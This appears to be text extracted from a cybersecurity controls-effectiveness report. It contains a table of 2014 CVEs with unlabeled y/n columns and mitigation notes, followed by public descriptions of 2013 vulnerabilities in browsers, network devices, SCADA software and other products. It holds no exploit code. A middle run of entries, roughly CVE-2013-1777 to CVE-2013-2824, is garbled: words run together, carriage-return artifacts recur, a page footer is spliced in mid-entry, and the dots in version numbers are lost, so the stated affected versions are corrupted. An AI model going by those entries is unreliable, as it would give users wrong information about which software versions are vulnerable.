CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.01 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153
Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384
Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub 401A90 CreateFileW function.

CVE-2013-1638
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734
Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
